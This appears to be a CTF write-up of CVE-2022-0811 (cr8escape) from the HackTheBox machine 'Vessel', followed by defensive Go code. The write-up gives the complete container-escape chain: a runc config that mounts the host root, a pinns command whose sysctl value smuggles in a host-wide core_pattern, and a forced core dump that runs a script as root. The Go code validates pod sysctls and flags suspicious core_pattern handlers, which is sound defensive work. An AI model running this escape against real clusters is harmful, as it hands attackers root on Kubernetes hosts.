# CVE-2022-0811

[CVE-2022-0811](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0811) is a vulnerability in [CRI-O](https://cri-o.io/) (a container runtime engine underpinning Kubernetes). Dubbed "**cr8escape**", it allows an attacker to **escape from a Kubernetes container**, gain root access to the host and move anywhere in the cluster. Exploitation of CVE-2022-0811 can enable a variety of actions on objectives, including execution of malware, exfiltration of data and lateral movement across pods.

***

## Proof-of-Concept

My notes from using CVE-2022-0811 to pwn the machine 'Vessel' on HackTheBox.

SUID bit on `/usr/bin/pinns`:

```bash
ethan@vessel:/$ ls -al /usr/bin/pinns
-rwsr-x--- 1 root ethan 814936 Mar 15 18:18 /usr/bin/pinns
```

Confirm `crio` version is 1.19:

```bash
ethan@vessel:/$ crio --version
crio version 1.19.6
Version:       1.19.6
GitCommit:     c12bb210e9888cf6160134c7e636ee952c45c05a
GitTreeState:  clean
BuildDate:     2022-03-15T18:18:24Z
GoVersion:     go1.15.2
Compiler:      gc
Platform:      linux/amd64
Linkmode:      dynamic
```

Reading about the exploit, the steps are: (1) create a pod/container, (2) use `pinns` to set the host-wide sysctl `kernel.core_pattern` through its unvalidated `-s` argument, (3) trigger a core dump and then reap the rewards. More information here: [CVE-2022-0811](https://www.crowdstrike.com/blog/cr8escape-new-vulnerability-discovered-in-cri-o-container-engine-cve-2022-0811/)

1. Create a container using `kubectl`, `minikube`, `docker` or `runc`.

```bash
## Create location for runc filesystem
ethan@vessel:/$ mkdir /tmp/pthree
ethan@vessel:/$ mkdir /tmp/pthree/rootfs

## Create runc configuration
ethan@vessel:/tmp/pthree$ runc spec --rootless

## Add the following entry under the 'mounts' section of config.json
{
    "type": "bind",
    "source": "/",
    "destination": "/",
    "options": [
        "rbind",
        "rw",
        "rprivate"
    ]
},

## Start runc
ethan@vessel:/tmp/pthree$ runc run privesc

root@runc:/# hostname
runc
```

2. Open a second terminal and write a simple PoC script to be executed:

```bash
ethan@vessel:/tmp$ cat poc
#!/bin/sh
whoami && hostname >> /tmp/out
```

From the same terminal, run the malicious `pinns` command:

```bash
ethan@vessel:/tmp$ /usr/bin/pinns -d /tmp/pthree -f privesc -s 'kernel.shm_rmid_forced=1+kernel.core_pattern=|/tmp/poc #' --ipc --net --uts
```

Verify that `netns` and `utsns` are created in `/tmp/pthree` from the container:

```bash
# ls -al /tmp/pthree
total 24
drwxrwxr-x  5 root   root    4096 Sep  2 09:07 .
drwxrwxrwt 17 nobody nogroup 4096 Sep  2 09:03 ..
-rw-rw-r--  1 root   root    2893 Sep  2 08:59 config.json
drwxr-xr-x  2 nobody root    4096 Sep  2 09:07 netns
drwxrwxr-x  2 root   root    4096 Sep  2 08:58 rootfs
drwxr-xr-x  2 nobody root    4096 Sep  2 09:07 utsns
```

3. In the first terminal (runc container) trigger a core dump to run the script:

```bash
root@runc:/# ulimit -c unlimited
root@runc:/# tail -f /dev/null &
[1] 32
root@runc:/# kill -SIGSEGV 32
root@runc:/# ps
    PID TTY          TIME CMD
      1 pts/0    00:00:00 sh
     18 pts/0    00:00:00 bash
     33 pts/0    00:00:00 ps
[1]+  Segmentation fault      (core dumped) tail -f /dev/null
```

4. Verify in the second terminal that the script was executed:

```bash
ethan@vessel:/tmp/pthree$ cat /tmp/out
root
vessel
```
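The walkthrough above shows the two halves of cr8escape: a pod sysctl value that smuggles a second, host-wide sysctl past `pinns` using its `+` separator, and a `kernel.core_pattern` that pipes core dumps into an attacker-controlled file. The following Go program is an added example written for this page, not code from the original notes or from the CRI-O project. It does two defender-side things: `ValidateSysctls` rejects pod sysctls the way a runtime should (only namespaced keys, and no `+`, whitespace or newlines in keys or values), and `CorePatternFinding` inspects the text of `/proc/sys/kernel/core_pattern` and flags a pipe handler that lives outside a trusted directory. The namespaced prefix list and the trusted handler directories are assumptions chosen for the example, and the sample inputs are constructed, one of them being the exact `-s` payload from the walkthrough.

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// Namespaced sysctl prefixes that are safe to set per pod. This mirrors the
// "safe" set Kubernetes documents; it is an assumption for this example and
// not CRI-O's own allow-list.
var namespacedPrefixes = []string{
	"net.",
	"kernel.shm",
	"kernel.msg",
	"kernel.sem",
	"fs.mqueue.",
}

// Directories where a legitimate core-dump helper (systemd-coredump, apport,
// abrt) is expected to live. Assumption for this example.
var trustedHandlerDirs = []string{
	"/usr/lib/", "/usr/libexec/", "/usr/sbin/", "/usr/bin/", "/lib/", "/sbin/",
}

func isNamespaced(key string) bool {
	for _, prefix := range namespacedPrefixes {
		if strings.HasPrefix(key, prefix) {
			return true
		}
	}
	return false
}

// ValidateSysctls checks a pod's sysctl map before anything is handed to pinns.
// Every key must be a namespaced sysctl, and neither key nor value may contain
// the "+" that pinns uses to join pairs (or any whitespace), so a value such as
// "1+kernel.core_pattern=|/tmp/poc #" cannot expand into a second, host-wide
// sysctl. One error is returned per offending entry.
func ValidateSysctls(sysctls map[string]string) []error {
	var errs []error
	for key, value := range sysctls {
		if strings.ContainsAny(key+value, "+\n\r\t ") {
			errs = append(errs, fmt.Errorf("%q: separator or whitespace in sysctl key/value", key))
			continue
		}
		if !isNamespaced(key) {
			errs = append(errs, fmt.Errorf("%q: not a namespaced sysctl", key))
		}
	}
	return errs
}

// CorePatternFinding takes the contents of /proc/sys/kernel/core_pattern and
// returns a non-empty description when core dumps are piped to a handler outside
// a trusted directory, which is the host state a successful cr8escape leaves
// behind. A plain file pattern ("core", "/var/crash/core.%p") is not flagged.
func CorePatternFinding(pattern string) string {
	p := strings.TrimSpace(pattern)
	if !strings.HasPrefix(p, "|") {
		return ""
	}
	fields := strings.Fields(strings.TrimPrefix(p, "|"))
	if len(fields) == 0 {
		return "core_pattern pipes dumps to an empty command"
	}
	handler := filepath.Clean(fields[0])
	for _, dir := range trustedHandlerDirs {
		if strings.HasPrefix(handler, dir) {
			return ""
		}
	}
	return fmt.Sprintf("core_pattern pipes dumps to untrusted handler %s", handler)
}

func main() {
	// Constructed sample: the payload used in the walkthrough, as a pod sysctl.
	injected := map[string]string{
		"kernel.shm_rmid_forced": "1+kernel.core_pattern=|/tmp/poc #",
	}
	for _, err := range ValidateSysctls(injected) {
		fmt.Println("rejected:", err)
	}

	// Constructed samples of core_pattern contents as read from /proc.
	for _, cp := range []string{
		"|/usr/lib/systemd/systemd-coredump %P %u %g %s %t %c %h",
		"|/tmp/poc #",
		"core",
	} {
		if f := CorePatternFinding(cp); f != "" {
			fmt.Println("finding:", f)
		}
	}
}
```

On a live host the second check would read `/proc/sys/kernel/core_pattern` (or the output of `sysctl kernel.core_pattern`) and pass the string to `CorePatternFinding`; running it from a node-level agent rather than from inside a pod matters, because the sysctl is host-wide and a compromised pod sees the same value it set.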
